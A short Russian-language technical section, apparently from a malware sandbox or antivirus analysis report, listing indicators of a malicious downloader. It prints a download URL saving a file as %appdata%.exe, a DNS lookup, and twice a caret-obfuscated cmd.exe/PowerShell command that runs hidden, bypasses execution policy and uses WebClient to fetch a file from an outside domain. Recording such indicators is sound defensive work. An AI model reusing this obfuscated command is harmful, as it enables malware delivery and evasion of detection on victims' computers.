Техническая информация
- http://www.zonedopesa.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "p^OW^E^Rsh^eLL^.EXe ^-Exec^U^t^IOn^P^o^LIC^Y B^yPaSs -N^OP^rOF^iLE^ -wiN^doW^s^t^YlE^ hiDDEn (^NEW-^obJe^CT SYS^te^m^.Ne^t.wE^bcL^I^eNt)^.dOw^nLOAd^f^iLE(^'http://www.zonedopesa.t...
- DNS ASK zo###opesa.top
- '<SYSTEM32>\cmd.exe' /c "p^OW^E^Rsh^eLL^.EXe ^-Exec^U^t^IOn^P^o^LIC^Y B^yPaSs -N^OP^rOF^iLE^ -wiN^doW^s^t^YlE^ hiDDEn (^NEW-^obJe^CT SYS^te^m^.Ne^t.wE^bcL^I^eNt)^.dOw^nLOAd^f^iLE(^'http://www.zonedopesa.t...' (со скрытым окном)